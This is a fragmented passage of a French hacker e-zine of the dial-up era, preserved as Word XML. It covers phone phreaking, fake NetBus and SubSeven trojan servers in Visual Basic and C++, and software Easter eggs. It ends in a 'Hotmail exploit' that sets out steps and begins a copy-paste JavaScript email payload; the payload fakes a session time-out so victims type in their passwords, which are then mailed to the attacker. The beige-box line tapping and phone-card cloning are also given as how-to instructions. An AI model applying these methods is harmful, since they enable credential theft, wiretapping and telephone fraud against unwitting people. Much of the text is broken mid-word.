        <w:t>METHODE : On utilise un programme qui permet de définir des trunks (le type de son a émettre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comme par exemple TLO, BlueDial, T4, BlueBeep ( le plus simple )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Scavenger ( le plus complet ). Ensuite il faut connaitre le trunk a émettre. </w:t>
        <w:br/>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:tab/>
        <w:tab/>
        <w:t>Beige Box</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:br/>
        <w:tab/>
        <w:tab/>
        <w:t>C'est le système le plus simple à utiliser. Il consiste à pirater une ligne grâce à un télépho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dont le cordon se termine par des pinces crocos. ( ou des bouts d'alu !!! ) </w:t>
        <w:br/>
        <w:tab/>
        <w:tab/>
        <w:t>METHODE : On se branche sur une ligne qui ne vous appartient pa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On achète un téléphone standard, on coupe la prise du téléphon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   et on met aux bouts des fils des pinces crocodil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insi, on peut se connecter sur n'importe quel fil téléphonique disponible à condi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 connaitre les couleurs des branchements. Les principales sources de connexio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nt les centraux de quartier (des boites extérieures) ou d'immeubles, les téléphon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à cartes style "Amarys". </w:t>
        <w:br/>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:tab/>
        <w:tab/>
        <w:t>Le Carding</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:br/>
        <w:tab/>
        <w:tab/>
        <w:t>Dans certains pays comme l'Australie les cartes téléphoniques sont sur des suppor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agnétiques. Il suffit donc de se procurer une carte neuve et deux cartes vid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is on copie la carte neuve sur les deux autres et basta. On utilise l'une des deu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 on garde l'autre en lieu sûr pour pouvoir "recharger" l'autre régulièrem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ette méthode ne fonctionne pas avec les cartes à puces car il y a un fusibl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qui déteriore la carte lorsqu'on essaye d'écrire dessus.</w:t>
        <w:br/>
        <w:tab/>
        <w:tab/>
        <w:t>Les techniques pour les cartes a puces requièrent plus de matèriel éléctroniqu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>2 - Conclusion(KOP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c'est tout pour la partie phreaking. Ne vous inquiétez pas, Elgadir se rattraper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le prochain mag. Nous le remercions quand même d'avoir fait cet article car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faut le dire, il n'a pas eu beaucoup de temps (le lendemain du soir où il l'a su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ab/>
        <w:t>il partait en Italie voir le pape :-) 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 xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>*</w:t>
      </w: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  <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve">                 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 xml:space="preserve">DIVERS  </w:t>
      </w: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  <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve">                                     </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>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1 - Emuler un trojan par Sbouby(trouvé par KOP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ab/>
        <w:tab/>
        <w:t>A - Informations sur les troja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Dans cet article nous allons parler de l'émulation des trojans pour piéger les petits malin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qui les utilis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Tout d'abords il faut savoir ce qu'est un trojan. En général c'est un programme qui se m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furtivement sur votre ordinateur et qui s'active au démarrage de Windows. Il permet d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controler votre ordinateur à distance par Internet, prendre vos mots de passes etc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es plus connus sont Back orifice, Netbus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Donc pour utiliser un trojan il faut un autre programme appelé CLIENT. Vous le lancez, vo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entrez l'adresse de la machine et vous la controllez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Maintenant la partie intéressante c'est l'émulation du SERVEUR (le programme sur l'ordinateu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de la victime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Nous allons faire croire au petit malin que notre ordinateur est infecté par un trojan et il v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donc se connecter sur nous et nous pourrons nous amuser un peu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Je vais prendre l'exemple du trojan NETBUS 1.7 mais TOUS les trojans fonctionnent à l'identiqu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e SERVEUR ouvre le port 12345 sur la victime et le CLIENT va scanner les ordinateurs pour trouv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une machine infecter. Il va donc trouver le port 12345 ouvert et se connecter dessus. Il va envoye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une demande d'identification et le serveur (dans ce cas NETBUS) lui retourne un signature (ici "NetBus 1.7"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i la signature est bonne le client indique à l'utilisateur qu'il est connecté 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Ensuite le CLIENT envoie des chaines de caractères (des phrases si vous préférez) du styl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"OPEN CD-ROM" et le SERVEUR execute la commande en ouvrant le cdrom sur l'ordinateur de la victim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Nous allons donc concevoir un programme, un faux SERVEUR, qui fera croire que le port 12345 es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ouvert et qui enverra la signature au CLIENT qui croira que l'ordinateur est infecté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Nous allons utiliser le Visual Basic (5 ou 6) pour sa simplicité mais cela marche pour TOUS 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angag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>B - Source pour l'émulateur de NETBUS (toutes versions)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Ouvrez le Visual Basic et créez un nouveau proje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ncluez WINSOCK.OCX en faisant un click droit su la barre d'outil et en choisissant COMPONEN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Ajoutez un control WINSOCK1, quatre TEXTBOX et trois COMMAND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Collez ensuite la source ci-dessou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es lignes précédées d'un ' (apostrophe) indique une ligne de commentaire qu'il n'est pa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nécessaire de garder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On vide la TEXTBOX n°1 pour faire de la place et on marque le STATUS du programme (écoute ou rien du tout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Private Sub Command1_Click(Index As Intege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1 = "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Command2.Caption = "STOP" Then Text1 = Text1 + vbCrLf + "--------------------------------" + vbCrLf +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"Emulation NETBUS " &amp; Text3 &amp; " sur " &amp; Text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 La partie importante, le coeur du programme. C'est ici que l'on ouvre le port 12345 et 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l'on attend une connectio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Dans la version ci-dessous on peut choisir le port à écouter et la signature désiré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Je ne conseille pas de changer la signature si l'on en est pas sur !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Private Sub Command2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Text2 = "" Or Text = "0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MsgBox "Veuillez entrez un numéro de port valide S.V.P !", vbExclamation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ab/>
        <w:t>"Erreur d'initialisation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GoTo n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Command2.Caption = "STOP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1 = Text1 + vbCrLf + "Emulation NETBUS " &amp; Text3 &amp; " sur " &amp; Text2 &amp; " terminée !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Command2.Caption = "Listen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2.Locked = Fa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3.Locked = Fa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LocalPort = Text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On Error GoTo erro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1 = Text1 + vbCrLf + "--------------------------------" + vbCrLf + "Emulation NETBUS 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ab/>
        <w:t xml:space="preserve"> &amp; Text3 &amp; " sur " &amp; Text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Command2.Caption = "STOP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2.Locked = Tr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3.Locked = Tr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rror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gBox "Port déjà utilisé", , "NETBUShack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on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Losque l'on écrit quelque chose dans la TEXTBOX4 et que l'on appuie sur entrée cela envoi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une commande au CLIENT, pour lui envoyer une boite de dialogue par exemple, avec la command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    Message;T'ES PIéGé LAMER !      Notez que le M majuscule est importan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Private Sub text4_KeyPress(KeyAscii As Intege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If KeyAscii = vbKeyReturn Then Winsock1.SendData Text4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Lorsqu'une connection est demandée par le client nous lui envoyont la signatur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de NETBUS pour qu'il croit qu'il a bien à faire à NETBUS, le vrai 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Nous indiquons dans la zone TEXT1 qu'une connection est demandé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Private Sub Winsock1_ConnectionRequest(ByVal requestID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Winsock1.State &lt;&gt; sckClosed Then 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1 = Text1 + vbCrLf + "Connection en cours sur le port " &amp; Text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Accept requestI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1 = Text1 + vbCrLf + Winsock1.RemoteHostIP + " est connecté !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SendData "NetBus " &amp; Text3 &amp; Chr$(13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Lorsque des données arrivent, nous les mettons dans la variable RECU et no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affichons cette variable dans TEXT1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>'C'est en fait ici que le client nous envoie ses ordres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Private Sub Winsock1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Dim recu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Winsock1.GetData recu, vb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Text1 = Text1 + vbCrLf &amp; rec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 xml:space="preserve"> ' Ca c'est pour le FUN :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Private Sub Command3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gBox "Piège à con pour NETBUS... ;)   Par Sbouby !", , "NETBUShack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</w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr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</w:rPr>
        <w:tab/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Avec cela vous avez de quoi vous amuser pas mal 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En effet vous pouvez envoyer des boites de dialogue à votre victime et lui faire croire que vou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a maitrisez TOTALEMENT. Mais ne rêvons pas, vous ne pouvez pas la contrôler totalement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Vous pouvez quand même rajouter une option de flood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!! Amusez vous bien !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>C - Source pour l'émulateur de SUBSEVEN 2.1 GOL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Même principe que ci-dessus mais pour SUBSEVEN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eule la signature change : elle est beaucoup plus complexe que celle de NETBUS !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00FF"/>
        </w:rPr>
        <w:tab/>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:tab/>
        <w:t>Private Sub Command1_Click(Index As Intege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1 = "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Command2.Caption = "STOP" Then Text1 = Text1 + vbCrLf + "--------------------------------" + vbCrLf +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"Emulation SUBSEVEN " &amp; Text3 &amp; " sur " &amp; Text2 &amp; " en cours...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Command2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Text2 = "" Or Text = "0" Then MsgBox "Veuillez entrez un numéro de port valide S.V.P !", vbExclamation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"Erreur d'initialisation": Text2 = "27374": GoTo n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Command2.Caption = "STOP"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1 = Text1 + vbCrLf + "Emulation SUBSEVEN " &amp; Text3 &amp; " sur " &amp; Text2 &amp; " terminée !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Command2.Caption = "Listen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2.Locked = Fa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3.Locked = Fa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l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LocalPort = Text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On Error GoTo error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List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1 = Text1 + vbCrLf + "--------------------------------" + vbCrLf + "Emulation SUBSEVEN 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ab/>
        <w:t>&amp; Text3 &amp; " sur " &amp; Text2 &amp; " en cours...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Command2.Caption = "STOP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2.Locked = Tr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3.Locked = Tr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xit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rror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MsgBox "Port déjà utilisé", , "SUBSEVENhack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non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text4_KeyPress(KeyAscii As Intege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KeyAscii = vbKeyReturn The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Winsock1.SendData Text4 &amp; Chr$(13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ab/>
        <w:t>Text4 = "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End If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1_ConnectionRequest(ByVal requestID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If Winsock1.State &lt;&gt; sckClosed Then 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1 = Text1 + vbCrLf + "Connection en cours sur le port " &amp; Text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Clos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Accept requestID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Text1 = Text1 + vbCrLf + "Client connecté !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>Winsock1.SendData Text3 &amp; Chr$(13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Winsock1_DataArrival(ByVal bytesTotal As Lon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</w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> Dim recu As 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Winsock1.GetData recu, vbString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ab/>
        <w:tab/>
        <w:t xml:space="preserve"> Text1 = Text1 + vbCrLf &amp; rec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800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Private Sub Command3_Click(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color w:val="008000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>MsgBox "Piège à con pour SUBSEVEN... ;)   Par Sbouby !", vbInformation, "SUBSEVENhack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nd Sub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c'est la fin de ce petit article sur l'émulation des trojan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us pouvez émuler d'autres trojans en regardant comment ils fonctionnent, sur quel port il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e connectent etc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>@++ Sbouby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2 - Source de l'émulateur NetBus en C++ par TiPia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 commencer vous créez un fichier de ressource avec une boite de dialogue IDD_DIALOG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uis deux editbox : IDC_INFO et IDC_ANSWER avec les boutons IDC_SENDMSG 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END_A. Puis une autre editbox IDC_DATAS et le bouton IDC_ATTENDR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a la source: (l'exe et les resources sont joints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/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/ NetBusEmU par TiPiaX - HackerStorm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/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#include &lt;windows.h&g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#include &lt;stdio.h&g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#include "resource.h"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#include &lt;winsock.h&gt;   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000080"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>//pour les socket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PROTOTYPES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LRESULT CALLBACK DlgProc(HWND hwnd, UINT msg, WPARAM wParam, LPARAM lParam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troyan(void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DATAS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HINSTANCE  hInst   = NULL;   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000080"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>// Variable pour contenir l'instance de notre programm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HWND</w:t>
        <w:tab/>
        <w:t xml:space="preserve">   hwnd    = NULL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buf[10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end[]="\r\n"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mymsg[10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msgbuffer[13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char hello[]="NetBus 1.70  \r\n";  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000080"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>// signature de Netbus 1.7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len = sizeof(SOCKADDR_I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nombre = 0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recu = 1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char buffer[30]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OCKET   s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OCKET   so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WSADATA  wsaData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WORD     verreq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truct   sockaddr_in sin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struct   sockaddr_in info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ENTRY POINT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WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInst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 xml:space="preserve">   LPSTR lpCmdLine, int nCmdShow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troyan(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hInst = hInstance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DialogBox(hInst, MAKEINTRESOURCE(IDD_DIALOG), NULL, ( DLGPROC ) DlgProc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turn (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!§ GESTIONNAIRE DE LA DIALOGBOX §!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 xml:space="preserve">LRESULT CALLBACK DlgProc(HWND hwnd, UINT msg, WPARAM wParam, LPARAM lParam)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witch(msg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 xml:space="preserve">case WM_COMMAND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 xml:space="preserve">{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>switch(LOWORD(wParam)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>case IDC_SENDMSG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GetDlgItemText(hwnd,IDC_MESSAGE,mymsg,10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sprintf(msgbuffer,"Message;%s%s", mymsg, end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send(sok,msgbuffer,strlen(msgbuffer),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brea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case IDC_SENDA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GetDlgItemText(hwnd,IDC_ANSWER,mymsg,10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sprintf(msgbuffer,"Answer;Person answered:%s%s", mymsg, end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send(sok,msgbuffer,strlen(msgbuffer),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brea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case IDC_ATTENDRE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recu = recv(sok,buf,sizeof(buf),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if (recu==0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>MessageBox(hwnd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>"Deconnection du client","NetBusEmU",MB_OK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>ExitProcess(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if (recu&gt;1) {SetDlgItemText(hwnd,IDC_DATAS,buf);goto theend;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theend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brea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>case WM_DESTROY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EndDialog(hwnd,FALS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>brea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ab/>
        <w:t>break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 xml:space="preserve">default: </w:t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return FALSE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 xml:space="preserve">return TRUE;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>/**** !§ TROYAN §! ****/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int troyan(void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initialisation du système de sockets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verreq=MAKEWORD(2,2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WSAStartup(verreq,&amp;wsaData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remplissage de la structure sockaddr_i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in.sin_family = PF_INE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in.sin_addr.s_addr = NULL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in.sin_port = htons(12345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création d'un socket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 = socket(PF_INET, SOCK_STREAM, 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bind le socket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 (bind (s,(struct sockaddr *)&amp;sin,len)==SOCKET_ERRO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socket en ecoute de connec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 (listen(s,1)==SOCKET_ERROR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ab/>
        <w:t>goto error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MessageBox(NULL,"Système en attente de connection","NetBusEmU",MB_OK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80"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000080"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t>//accepte la connection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ok=accept(s,(struct sockaddr *)&amp;info,&amp;len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if (sok == INVALID_SOCKET){ goto error;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end(sok,hello,strlen(hello),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goto fin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error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nombre=WSAGetLastError(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sprintf(buffer,"%d",nombre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MessageBox(NULL,buffer,"ERROR : WSAGetLastError :",MB_OK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ExitProcess(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fin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return (0)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}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color w:val="000000"/>
        </w:rPr>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t>Have Fu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ab/>
        <w:t>3 - Les œufs de Pâques par Lauspe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>Je suis sûr que vous ne savez ce que sont les œufs de Pâques en informatique !</w:t>
        <w:br/>
        <w:tab/>
        <w:tab/>
        <w:t>Je vais vous expliquer : les œufs de Pâques, en informatique, ce sont d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>manipulations que l'on peut faire avec les programmes mais que person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 xml:space="preserve">ne connaît, mis à part les programmeur dudit programme et de moi. </w:t>
        <w:br/>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="008000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
        <w:tab/>
        <w:t>Microsoft Excel 97</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
        <w:tab/>
        <w:t>Tout d’abord démarrez Excel.</w:t>
        <w:br/>
        <w:tab/>
        <w:tab/>
        <w:t>Faîtes F5 et vous obtiendrez la boite de dialogue ATTEINDRE</w:t>
        <w:br/>
        <w:tab/>
        <w:tab/>
        <w:t>Tapez X97:L97 et validez</w:t>
        <w:br/>
        <w:tab/>
        <w:tab/>
        <w:t>Une ligne (97) est sélectionné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>Appuyez sur Tab une fois et la case blanche qui était dans la colonne A passe dans la colonne B.</w:t>
        <w:br/>
        <w:tab/>
        <w:tab/>
        <w:t>Appuyez alors sur CTRL-SHIFT(gauche) en même temps et cliquez sans lâcher les touches sur l'icône GRAPHIQUES</w:t>
        <w:br/>
        <w:tab/>
        <w:tab/>
        <w:t>Admirez… Le bouton gauche permet d’accélèrer, le bouton droit de ralentir. Echap quitte.</w:t>
        <w:br/>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="008000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
        <w:tab/>
        <w:t>Microsoft Internet Explorer 5</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
        <w:tab/>
        <w:t>Démarrez IE5</w:t>
        <w:br/>
        <w:tab/>
        <w:tab/>
        <w:t>Tapez 'about:&lt;!-- introducing the Trident team --&gt;' sans les '' dans la ligne d'adresses.</w:t>
        <w:br/>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="008000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
        <w:tab/>
        <w:t>Microsoft Internet Explorer 5</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
        <w:tab/>
        <w:t>Démarrez IE5</w:t>
        <w:br/>
        <w:tab/>
        <w:tab/>
        <w:t>Faîtes OUTILS --&gt; OPTIONS INTERNET</w:t>
        <w:br/>
        <w:tab/>
        <w:tab/>
        <w:t>Vous obtenez la boîte de dialogue des options</w:t>
        <w:br/>
        <w:tab/>
        <w:tab/>
        <w:t>Cliquez sur LANGUES (en bas)</w:t>
        <w:br/>
        <w:tab/>
        <w:tab/>
        <w:t>Cliquer sur AJOUTER ; taper 'ie-ee' sans les ''</w:t>
        <w:br/>
        <w:tab/>
        <w:tab/>
        <w:t>Monter cette personnalisation ou descendre le language par défau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ab/>
        <w:t>mais le langage personnalisé doit être tout en haut de la liste de langues.</w:t>
        <w:br/>
        <w:tab/>
        <w:tab/>
        <w:t>Validez</w:t>
        <w:br/>
        <w:tab/>
        <w:tab/>
        <w:t>Cliquez sur l'icône RECHERCHER et vous verrez un menu en anglais.</w:t>
        <w:br/>
        <w:tab/>
        <w:tab/>
        <w:t>Cliquez sur PREVIOUS SEARCH et essayez les 2 premiers liens hypertext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>L'un donne l'A propos de et l'autre des photos… Le troisième menu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>vous redonne la boîte de dialogue des langues, supprimez ie-ee, validez,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lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
        <w:tab/>
        <w:t>et tout devrait rentrer dans l'ordre après un redémarrage du programme.</w:t>
        <w:br/>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="008000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
        <w:tab/>
        <w:t>Microsoft Word 97</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
        <w:tab/>
        <w:tab/>
        <w:t>Ouvrez Word… Ecrivez 'Blue' sans les ''</w:t>
        <w:br/>
        <w:tab/>
        <w:tab/>
        <w:t>Sélectionnez le mot Blue</w:t>
        <w:br/>
        <w:tab/>
        <w:tab/>
        <w:t>Faîtes FORMAT --&gt; Police --&gt; Gras, Bleu ; Validez</w:t>
        <w:br/>
        <w:tab/>
        <w:tab/>
        <w:t>Rajoutez un espace ('Blue_' ne pas écrire les '' ni le _ mais faire un espace !)</w:t>
        <w:br/>
        <w:tab/>
        <w:tab/>
        <w:t>Selectionnez Blue et l'espace</w:t>
        <w:br/>
        <w:tab/>
        <w:tab/>
        <w:t>Allez dans l'a propos de…</w:t>
        <w:br/>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">Appuyez en même temps sur CTRL-ALT-SHIFT </w:t>
        <w:br/>
        <w:tab/>
        <w:tab/>
        <w:t>Sans lâcher les trois touches, appuyer sur l'icône de Word en haut à gauche de l'a propos de…</w:t>
        <w:br/>
        <w:tab/>
        <w:tab/>
        <w:t>Admirer… Echap pour quitter, Z pour le gauche, M pour le droit.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lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="008000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
        <w:tab/>
        <w:t>Winamp</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
        <w:tab/>
        <w:t>Démarrez Winamp et même faîtes jouer une chanson…</w:t>
        <w:br/>
        <w:tab/>
        <w:tab/>
        <w:t>Cliquez sur SHIFT(gauche) et sur le carré (STOP)…</w:t>
        <w:br/>
        <w:tab/>
        <w:tab/>
        <w:t>La musique s'éteindra lentement, comme si vous étiez un DJ !</w:t>
        <w:br/>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="008000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
        <w:tab/>
        <w:t>Winamp</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
        <w:tab/>
        <w:t>Démarrez Winamp</w:t>
        <w:br/>
        <w:tab/>
        <w:tab/>
        <w:t>Tapez 'nullsoft' et appuyez sur ECHAP après chaque L</w:t>
        <w:br/>
        <w:tab/>
        <w:tab/>
        <w:t>Le nom de la barre de titre de Winamp devrait avoir changé</w:t>
        <w:br/>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">Allez dans CREDITS de l'a propos de et attendez un peu avant </w:t>
        <w:br/>
        <w:tab/>
        <w:tab/>
        <w:t>de voir apparaître la photo d'un chat !</w:t>
        <w:br/>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="008000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
        <w:tab/>
        <w:t>Winamp</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
        <w:tab/>
        <w:t>Démarrez Winamp, tapez 'nullsoft' et ECHAP après chaque L</w:t>
        <w:br/>
        <w:tab/>
        <w:tab/>
        <w:t>Allez dans l'A propos de (là ou il y a la tête qui bouge)</w:t>
        <w:br/>
        <w:tab/>
        <w:tab/>
        <w:t>Faites CTRL-ALT-SHIFT et double cliquez sur la ligne Copyright.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color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>4 - L'Exploit HotMail par Lauspe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et article décrit un sérieux problème de sécurité que nous avons découvert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vec le service Microsoft Hotmail, lequel nous permet de voler les passwords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es utilisateurs Hotmail. Cet exploit nécessite que nous envoyons à notre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victime un e-mail. Cet e-mail contiendra du code javascript. Quand l’utilisateur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otmail verra ce message, le code javascript le forcera à ré-rentrer son login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t son password Hotmail. En faisant cela, l’utilisateur Hotmail nous enverra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n nom d’utilisateur, son password et son adresse IP par mail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ous obtiendrons ainsi le contrôle total du compte Hotmail de notre vic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ourquoi cet exploit fonctionne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 problème de sécurité est du au service Microsoft Hotmail lui-mê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Hotmail ne filtre pas le code Javascript contenu dans les e-m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ans le cas de cet exploit, le code javascript modifie les propriét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e chaque lien de l’interface Hotmail. Les liens étant modifié, qu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’utilisateur clique dessus, un message Hotmail est affiché, inform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’utilisateur d’un timed-out de sa session Hotmail, et qu’il doit ré-rent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n username et son password pour continuer. La page du Time-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ntient en effet des textbox à cet effet. Ainsi lorsque l’utilisate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remplit ces textbox, les informations nous sont envoyé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mment se protéger de ce trou de sécurité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 attendant que Hotmail fixe le problème de sécurité, nous suggér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aux utilisateurs Hotmail de désactiver Javascript dans leur navigate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nternet. Même les utilisateurs connaissant cet exploit ne sont pas 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’abri d’autres programmes Javascript noyé dans les E-m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aintenant vous voilà prév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Les lignes suivantes montrent comment utiliser l’exploit Hot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ape 1 :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ous visitons le site </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="0000FF"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>www.hotmail.com</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">et nous ouvrons un compte e-mai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ape 2 :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ous visitons le site </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="0000FF"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">www.geocities.com </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> et nous nous inscrivons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fin de détenir une page web. Nous choisissons un username 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« tamereenshort ». Des informations nous sont demandées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ous remplissons en disant n’importe quoi, sauf pour l’adresse e-mail,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ous fournissons celle de l’étape 1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 plus de notre inscription, nous recevons une nouvelle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dresse e-mail du type </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="0000FF"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>tamereenshort@geocities.com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l est bien sûr possible d’utiliser un autre fournisseur de serv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ape 3 :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ans un éditeur de texte (genre le bloc note de Windows), nous entrons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le texte inscrit ci-dessous et nous l’enregistrons en tant que « message.htm »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La ligne 17 contient notre username Geocities de l’étape 2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Vous la remplacerez donc bien sur par le votre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ab/>
        <w:tab/>
        <w:t>COPIER/COLLER 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&lt;html&gt;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&lt;body&gt;</w:t>
        <w:br/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t>&lt;p&gt;"Go where you want today" - Blue Adept&lt;/p&gt;</w:t>
        <w:br/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t>&lt;script&gt;</w:t>
        <w:br/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t>function getmess(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{</w:t>
        <w:br/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t>return "&lt;table border=0 cellpadding=5 cellspacing=5 width=508 height=90%&gt;" +</w:t>
        <w:br/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
